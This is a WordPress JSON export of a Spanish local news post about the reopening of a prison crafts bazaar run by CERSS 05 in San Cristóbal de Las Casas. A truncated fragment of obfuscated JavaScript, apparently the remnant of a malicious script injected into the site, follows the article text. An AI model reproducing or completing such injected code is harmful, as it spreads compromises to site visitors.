{"id":16924,"date":"2024-08-01T01:37:42","date_gmt":"2024-08-01T01:37:42","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16924"},"modified":"2024-08-01T01:37:43","modified_gmt":"2024-08-01T01:37:43","slug":"vuelve-bazar-penitenciario-del-cerss-5-al-mercado-de-dulces-y-artesanias","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16924","title":{"rendered":"Vuelve Bazar Penitenciario del Cerss 5 al Mercado de Dulces y Artesan\u00edas"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"16925\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240731-WA0014-1024x768.jpg\" alt=\"\" class=\"wp-image-16925\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240731-WA0014-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240731-WA0014-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240731-WA0014-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240731-WA0014-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240731-WA0014.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"16926\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240731-WA0015-1024x768.jpg\" alt=\"\" class=\"wp-image-16926\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240731-WA0015-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240731-WA0015-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240731-WA0015-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240731-WA0015-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240731-WA0015.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- Tras un receso temporal, se reabri\u00f3 el Bazar Penitenciario del Centro Estatal de Reinserci\u00f3n Social para Sentenciados n\u00famero 05, un espacio dedicado a la venta de art\u00edculos elaborados por los internos.<\/p>\n\n\n\n<p>El bazar se encuentra ubicado en un local del Mercado de Dulces y Artesan\u00edas, y su reapertura ha sido anunciada por las coordinadoras Patricia de Le\u00f3n Morales y Yareni del Roc\u00edo G\u00f3mez Hern\u00e1ndez.<\/p>\n\n\n\n<p>\u201cEl Bazar Penitenciario ofrece una variedad de productos artesanales, todos ellos fabricados por los internos como parte de los programas de reinserci\u00f3n y capacitaci\u00f3n que se desarrollan dentro del penal. Entre los art\u00edculos disponibles se pueden encontrar piezas de madera tallada, tejidos, art\u00edculos de cuero, entre otros, todos elaborados con dedicaci\u00f3n y esmero\u201d, se\u00f1alaron en entrevista.<\/p>\n\n\n\n<p>Las coordinadoras invitan al p\u00fablico en general a visitar el bazar y adquirir algunos de estos productos, contribuyendo de esta manera al proceso de reintegraci\u00f3n social de los internos, as\u00ed como al sostenimiento de las actividades productivas dentro del CERSS 05.<\/p>\n\n\n\n<p>\u201cEl Bazar Penitenciario no solo es una oportunidad para adquirir productos \u00fanicos y de calidad, sino tambi\u00e9n para apoyar una causa que busca ofrecer segundas oportunidades a quienes se encuentran en proceso de rehabilitaci\u00f3n\u201d, dijeron por \u00faltimo.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal San Crist\u00f3bal de Las Casas.- Tras un receso temporal, se reabri\u00f3 el Bazar Penitenciario del Centro Estatal de Reinserci\u00f3n Social para Sentenciados n\u00famero 05, un espacio dedicado a la venta de art\u00edculos elaborados por los internos. El bazar se encuentra ubicado en un local del Mercado de Dulces y Artesan\u00edas, y su &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16926,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-16924","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16924","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16924"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16924\/revisions"}],"predecessor-version":[{"id":16927,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16924\/revisions\/16927"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16926"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16924"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16924"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16924"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}